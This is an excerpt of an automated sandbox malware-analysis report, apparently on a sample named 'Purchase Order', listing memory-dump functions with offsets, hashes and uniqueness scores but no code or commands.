                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ea31c26ddffb51bd3dd945928e102f9c32839c6ec44a81d643b0ba8f93fcd0b9
                                                                                                            • Instruction ID: af68e0d518743272724528b50241d61d010f8beda22e7a8700dc8926f281aa88
                                                                                                            • Opcode Fuzzy Hash: ea31c26ddffb51bd3dd945928e102f9c32839c6ec44a81d643b0ba8f93fcd0b9
                                                                                                            • Instruction Fuzzy Hash: C1C19E74E01218CFDB14DFA9D984B9DBBB2AF89304F2080AAD409AB355DB759E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DB0D60 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a2fa7331a757732ac4cd172d665963bddc171b28762d9c3da816d20cee9e76f
                                                                                                            • Instruction ID: 1dcda6e3056b205c7269b5e04d4b317817366f91c22ece99489e56422a5adb14
                                                                                                            • Opcode Fuzzy Hash: 6a2fa7331a757732ac4cd172d665963bddc171b28762d9c3da816d20cee9e76f
                                                                                                            • Instruction Fuzzy Hash: 56C18074E01218CFDB14DFA9D998B9DBBB2BF89300F1080AAD809AB355DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBCD10 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d54078d488c671ec3c232c38d049dd355b0a9a0f7538cbdf16784c6d841b9208
                                                                                                            • Instruction ID: 41d326160a20ccff9cc3484377761ccf760c7c1a7f2496f88a678f24ecda379e
                                                                                                            • Opcode Fuzzy Hash: d54078d488c671ec3c232c38d049dd355b0a9a0f7538cbdf16784c6d841b9208
                                                                                                            • Instruction Fuzzy Hash: 65C18F74E01218CFDB14DFA9D994B9DBBB2BF89300F2080AAD409AB365DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DB0900 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 59dd5f1acb55e8a3fd9f684e833bfc54f3efc77bbe4e317b73cfeff9b449bb33
                                                                                                            • Instruction ID: aad73d3e6aca9535256062a2f00742c12aa5ee7f01fa68d366e193c0302198da
                                                                                                            • Opcode Fuzzy Hash: 59dd5f1acb55e8a3fd9f684e833bfc54f3efc77bbe4e317b73cfeff9b449bb33
                                                                                                            • Instruction Fuzzy Hash: A8C19F74E01218CFDB14DFA9D998B9DBBB2BF89300F1080AAD809AB355DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBF880 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 78dedfb4bd0312076cbe418c755813cc8a8574f651b5060cc9211d79f9d70fc2
                                                                                                            • Instruction ID: 92781c1400fefe226a7fb0ab1a7b9954bc68e77cb56c952879cf7e0effbb0943
                                                                                                            • Opcode Fuzzy Hash: 78dedfb4bd0312076cbe418c755813cc8a8574f651b5060cc9211d79f9d70fc2
                                                                                                            • Instruction Fuzzy Hash: 8FC19E74E01218CFDB14DFA9D994B9DBBB2EF89300F2080AAD809AB355DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBC8B8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8a0d99aeb4e6e309f8eb31a6ab05cf77519d9f429597c8ce625f4a273f680604
                                                                                                            • Instruction ID: 8630d51c9e90a5c6efd60fd8e7130a4e489465bf01a5fd27856cc13db35eed4c
                                                                                                            • Opcode Fuzzy Hash: 8a0d99aeb4e6e309f8eb31a6ab05cf77519d9f429597c8ce625f4a273f680604
                                                                                                            • Instruction Fuzzy Hash: 67C18F74E01218CFDB14DFA9D994B9DBBB2BF89300F1080AAD809AB365DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DB04A0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fc1fed5b6ed9b9333140bc067540abbc2f2f2271975d0c9dd35249e95a9584f7
                                                                                                            • Instruction ID: 8ef382fbf60cd7296cb2bd6db6070c93142fbb9081cd61fda9ed360d2c98c881
                                                                                                            • Opcode Fuzzy Hash: fc1fed5b6ed9b9333140bc067540abbc2f2f2271975d0c9dd35249e95a9584f7
                                                                                                            • Instruction Fuzzy Hash: 63C19074E01218CFDB14DFA9D988B9DBBB2BF89300F1081AAD809AB355DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DB0040 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 213052a37a649f29f0abeb173cca7d72ed80dd3980e122d43306f95aa4f25eb5
                                                                                                            • Instruction ID: f914b71f004ad541ad0e8cf60c3ebd38a437cc1c20377ae2a09b994177b122aa
                                                                                                            • Opcode Fuzzy Hash: 213052a37a649f29f0abeb173cca7d72ed80dd3980e122d43306f95aa4f25eb5
                                                                                                            • Instruction Fuzzy Hash: B8C19074E01218CFDB14DFA9D988B9DBBB2BF89300F1080AAD809AB355DB755E85CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBC460 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 580bf5fefb6e54285490e4a1fe127efc77ee61b3132e7f4e3322dca83b6a40c7
                                                                                                            • Instruction ID: 21a1b98f577c81c4ed6209d4a253208ea0065e5a28efa74ab19f98fe6912183d
                                                                                                            • Opcode Fuzzy Hash: 580bf5fefb6e54285490e4a1fe127efc77ee61b3132e7f4e3322dca83b6a40c7
                                                                                                            • Instruction Fuzzy Hash: 85C18F74E01218CFDB14DFA9D994B9DBBB2BF89300F2080AAD409AB365DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBC008 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bede9522dadef22258652709bd28a640c2967ea3ba8cae3186c6c2bbad9999c9
                                                                                                            • Instruction ID: 1f558f1fc7818ad195c04b775145e3fc0394941903b74d5058faa29d791b4849
                                                                                                            • Opcode Fuzzy Hash: bede9522dadef22258652709bd28a640c2967ea3ba8cae3186c6c2bbad9999c9
                                                                                                            • Instruction Fuzzy Hash: 2CC19E74E01218CFDB14DFA9D984B9DBBB2BF89300F1081AAD409AB365DB759E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBF428 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d29a29d7c5cbba9105e3437e6044af5c07ca9946847563b152a3c813c7372d92
                                                                                                            • Instruction ID: 1b9b4f9c0ff2b0bf2236821abedb67ba92834715fbfc184905eafffdeb873b21
                                                                                                            • Opcode Fuzzy Hash: d29a29d7c5cbba9105e3437e6044af5c07ca9946847563b152a3c813c7372d92
                                                                                                            • Instruction Fuzzy Hash: 52C19F74E01218CFDB14DFA9D994B9DBBB2EF89300F1080AAD809AB365DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBEFD0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a644270fbdabb55279e5fc93a267d1902ee84b95c27f1269da8882c26e54aa7
                                                                                                            • Instruction ID: 359851751ad3964faca01f64f605349ab58ae9d996b06c15456b5ebf08901f2a
                                                                                                            • Opcode Fuzzy Hash: 1a644270fbdabb55279e5fc93a267d1902ee84b95c27f1269da8882c26e54aa7
                                                                                                            • Instruction Fuzzy Hash: 2AC19F74E01218CFDB14DFA9D984B9DBBB2EF89300F1081AAD809AB355DB759E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBBBB0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a3a717afb94f0c3aecc8d2eb03171080570fccfc354cd5942a27ef44845dd990
                                                                                                            • Instruction ID: 71aa1d8c9ecd9a1cdd471d4ed10936b9ca1197e01f75757f3bb531c5df8dd2a8
                                                                                                            • Opcode Fuzzy Hash: a3a717afb94f0c3aecc8d2eb03171080570fccfc354cd5942a27ef44845dd990
                                                                                                            • Instruction Fuzzy Hash: CDC18F74E01218CFEB14DFA9D994B9DBBB2BF89300F1080AAD409AB355DB759E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBB758 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 23c6cfeef4f94429f5869e56016e9c753fae67a3266fb8f30fa872870e989920
                                                                                                            • Instruction ID: 9dd6337f8a3c50b44a29b34829d0bf59166743c2b2f16805921f86cfbd98c2cc
                                                                                                            • Opcode Fuzzy Hash: 23c6cfeef4f94429f5869e56016e9c753fae67a3266fb8f30fa872870e989920
                                                                                                            • Instruction Fuzzy Hash: 40C19F74E01218CFEB14DFA9D994B9DBBB2EF89300F1080AAD409AB355DB759E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBEB78 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fbe3b6daeeb963989ad00bd18bae5d5892da6d6545386e747f04b6c0714a6981
                                                                                                            • Instruction ID: b8c672387741c0d9cf7ea940f0ef0e90611257d76d84b4d5a26b477747f0726c
                                                                                                            • Opcode Fuzzy Hash: fbe3b6daeeb963989ad00bd18bae5d5892da6d6545386e747f04b6c0714a6981
                                                                                                            • Instruction Fuzzy Hash: 88C19F74E01218CFDB14DFA9D984B9DBBB2EF89300F2080AAD409AB355DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBB300 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 69eb49bd9a0b82e1eb53a323e11d437de7d8f35c26b8b1712080dff35a61bdd0
                                                                                                            • Instruction ID: c1c0946296479b99e6280de4e2ae6b1bdd2e8a821214dcdb9145422bb56b1fe0
                                                                                                            • Opcode Fuzzy Hash: 69eb49bd9a0b82e1eb53a323e11d437de7d8f35c26b8b1712080dff35a61bdd0
                                                                                                            • Instruction Fuzzy Hash: 34C19F74E01218CFEB14DFA9D994B9DBBB2BF89300F1080AAD409AB355DB759E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBE720 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e5e950c85295f8a3e0c13138019994cbadf10020da171744f38ae7b370c5ed57
                                                                                                            • Instruction ID: 8ac3b657095b83b1c7aa30c5e7d82e7dc5c6a7bd38714cbdd63fddb45099cb0c
                                                                                                            • Opcode Fuzzy Hash: e5e950c85295f8a3e0c13138019994cbadf10020da171744f38ae7b370c5ed57
                                                                                                            • Instruction Fuzzy Hash: 7DC19E74E01218CFDB14DFA9D994B9DBBB2EF89300F2081AAD409AB355DB749E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBE2C8 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9787c6ee39ebd85bb1e56326b1c08bd719065256218c567a3174b4ec5d04821d
                                                                                                            • Instruction ID: 9f1e495834d288d8662fd3d7eb379f375d4709b8e16bd4e03f269119590e4a68
                                                                                                            • Opcode Fuzzy Hash: 9787c6ee39ebd85bb1e56326b1c08bd719065256218c567a3174b4ec5d04821d
                                                                                                            • Instruction Fuzzy Hash: 42C19F74E01218CFDB54DFA9D984B9DBBB2EF89300F1080AAD409AB355DB759E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBDE70 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9b5e3ad2439cacb7e70e500cd3561a9de41bf78c834dfec2f7d9132ce276d471
                                                                                                            • Instruction ID: ba485a260d97775fda938ec70f7b5687c25568564cdf940b00da4b0b0c075eb9
                                                                                                            • Opcode Fuzzy Hash: 9b5e3ad2439cacb7e70e500cd3561a9de41bf78c834dfec2f7d9132ce276d471
                                                                                                            • Instruction Fuzzy Hash: 73C18F74E01218CFDB14DFA9D984B9DBBB2EF89300F2081AAD409AB355DB759E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DBDA18 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b2e0ff2fbe02254d574aa617d8f6fd8026fbb200105e3a35eb4ee3561c79ea4d
                                                                                                            • Instruction ID: 65afe6d5ebeecfa4af3a67376f42d713343bf399e107f43848d334419056917e
                                                                                                            • Opcode Fuzzy Hash: b2e0ff2fbe02254d574aa617d8f6fd8026fbb200105e3a35eb4ee3561c79ea4d
                                                                                                            • Instruction Fuzzy Hash: 3BC19F74E01218CFDB14DFA9D984B9DBBB2EF89300F2080AAD409AB355DB755E85CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DB11B1 Relevance: .2, Instructions: 224COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 966ad1b764aaa5838d8e0702614f21b5097ee1d541c571685ba395e21e78308b
                                                                                                            • Instruction ID: c87a2c26f37c0ec4da7b011a50cc843db9ce53d9f7f50b2a73538ac71a45316d
                                                                                                            • Opcode Fuzzy Hash: 966ad1b764aaa5838d8e0702614f21b5097ee1d541c571685ba395e21e78308b
                                                                                                            • Instruction Fuzzy Hash: 9CA1F570D01208CFEB14DFA9C594BDDBBB2BF48300F24926AE409AB3A5DB749985CF55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DB11C0 Relevance: .2, Instructions: 220COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e606334f010b085249af58c45283ce68aad652cfce3f051d5eb62b0a77c3e6ae
                                                                                                            • Instruction ID: 25758e4c111acb154e383025daa67aa556e0609c0e8041b036ccfbd8f0f1f59b
                                                                                                            • Opcode Fuzzy Hash: e606334f010b085249af58c45283ce68aad652cfce3f051d5eb62b0a77c3e6ae
                                                                                                            • Instruction Fuzzy Hash: 1CA1F670D01208CFEB14DFA9C554BDDBBB2FF48310F20926AE409AB295DB749985CF55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 05DB1506 Relevance: .2, Instructions: 202COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4127452852.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_5db0000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ffc3d58974f2bee2817a96a93941a153b89ba61281036ebca0b95ea6ea7cadb4
                                                                                                            • Instruction ID: 2f1f8b6a341ff18a58a0695b81cec043b977df4657c43ad8b269c268d0ac8af3
                                                                                                            • Opcode Fuzzy Hash: ffc3d58974f2bee2817a96a93941a153b89ba61281036ebca0b95ea6ea7cadb4
                                                                                                            • Instruction Fuzzy Hash: A391E574D01208CFEB10DFA9C594BDDBBF1BF49310F20925AE40AAB295DB749985CF15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E936CE Relevance: .0, Instructions: 17COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d026e7d692bd018698b2cac122db20116b00aa718f7f8cf9ce650615c72a6bb9
                                                                                                            • Instruction ID: f50ddb69eb1483ecb197be6fddeafc43048c288a5745bdd38e3890db498aff78
                                                                                                            • Opcode Fuzzy Hash: d026e7d692bd018698b2cac122db20116b00aa718f7f8cf9ce650615c72a6bb9
                                                                                                            • Instruction Fuzzy Hash: DDD06774E14259CACB10DF9998403ADB776EB96200F0025998109B7240D7305E95CA16
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06E9DEA0 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4128089200.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6e90000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xjq$Xjq$Xjq$Xjq
                                                                                                            • API String ID: 0-2725347807
                                                                                                            • Opcode ID: d144af54ed9467de0917fd76591cd6c2f90636a6e862cd1c7e98e7eb250278d6
                                                                                                            • Instruction ID: 487ed24b41766703eb86869a8de823dcb3de10272e3978582712eb8b7b86652e
                                                                                                            • Opcode Fuzzy Hash: d144af54ed9467de0917fd76591cd6c2f90636a6e862cd1c7e98e7eb250278d6
                                                                                                            • Instruction Fuzzy Hash: 1641DA71E0073A4BDFB49A68C8513BEB7A66F84314F211575D92AA7380EB30CD8197B1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 016660E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4124412884.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_1660000_Purchase Order.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \;fq$\;fq$\;fq$\;fq
                                                                                                            • API String ID: 0-4080798596
                                                                                                            • Opcode ID: 7b38e3dec392d565a89f8719507ff1bcf54c89f9e27ddb22ae7861e1f0f1bae4
                                                                                                            • Instruction ID: b089165b223d18e16c81ec01d03866b4fca291dc9ef64c4412f6ec00b6c89620
                                                                                                            • Opcode Fuzzy Hash: 7b38e3dec392d565a89f8719507ff1bcf54c89f9e27ddb22ae7861e1f0f1bae4
                                                                                                            • Instruction Fuzzy Hash: BF017C71B10014CFCB249E2DDC50926B7EEAF88766725416AE50ACB3A2DF71DC428790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%